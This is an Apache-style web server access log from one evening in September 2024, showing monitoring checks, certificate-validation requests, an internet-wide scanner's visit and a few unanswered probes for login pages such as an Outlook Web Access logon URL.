45.95.147.211 - - [02/Sep/2024:21:41:31 +0200] "GET /login.asp HTTP/1.1" 404 285 "-" "-"
195.56.55.225 - - [02/Sep/2024:21:42:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [02/Sep/2024:21:42:27 +0200] "GET /.well-known/acme-challenge/EO21V9E0K-6R46N8FNNCHZB2RIZG05NU HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:21:42:27 +0200] "GET /.well-known/acme-challenge/M38MJV1S37OEJBDIAEVPTY97G6B9R3YV HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:21:42:27 +0200] "GET /.well-known/acme-challenge/4Q77LU4F7WF3ESC0L4XWIWHQ29JPK_2B HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:21:42:27 +0200] "GET /.well-known/acme-challenge/0-5202N9Y7661U3KWGE89ZG4LISGQZU_ HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:21:42:28 +0200] "GET /.well-known/acme-challenge/LNRY5CAYN2I3K69NQN0Q827NDS42DOW4 HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:21:42:28 +0200] "GET /.well-known/acme-challenge/BJB2GXBCLCMOV-ZFL4CET3U2OMSVSTKU HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [02/Sep/2024:21:44:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:46:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:48:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.94 - - [02/Sep/2024:21:48:58 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.95.49.158 - - [02/Sep/2024:21:50:28 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:21:50:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:21:50:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:21:52:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:54:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:21:55:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:21:55:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:21:56:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.21.115.198 - - [02/Sep/2024:21:56:42 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:21:58:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:22:00:00 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mtvsz.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
